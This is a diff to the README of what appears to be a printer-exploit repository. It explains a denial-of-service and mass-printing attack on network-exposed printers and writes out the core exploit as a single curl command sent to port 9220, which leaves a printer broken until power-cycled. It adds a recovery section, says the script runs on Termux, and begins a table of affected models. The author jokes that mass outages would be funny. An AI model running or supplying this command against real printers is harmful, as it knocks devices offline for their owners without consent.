ReallySecureShell/PapersPlease/README.md

 As I’m not going to be responsible for some kid taking every port-forwarded printer down on the Internet, as funny as that would be.

-NOTE:<br> An exploited printer will need to be power-cycled in order to return to a working-state.

-Additionally:<br>
-This script is fully compatible with `Termux` for Android.

 ## How It Works

 While the inner workings are more complicated, the exploit in its purest form is as follows:<br>
 `curl [IP]:9220 -X 'open 99999999'`<br>
 As mentioned above, the printer will go into a failed state and remain in said state until restarted.

+## Recovering from Exploit

+An exploited printer will need to be power-cycled in order to return to a working-state.

 ## Known Affected Models
 | Model | DoS | Mass Print |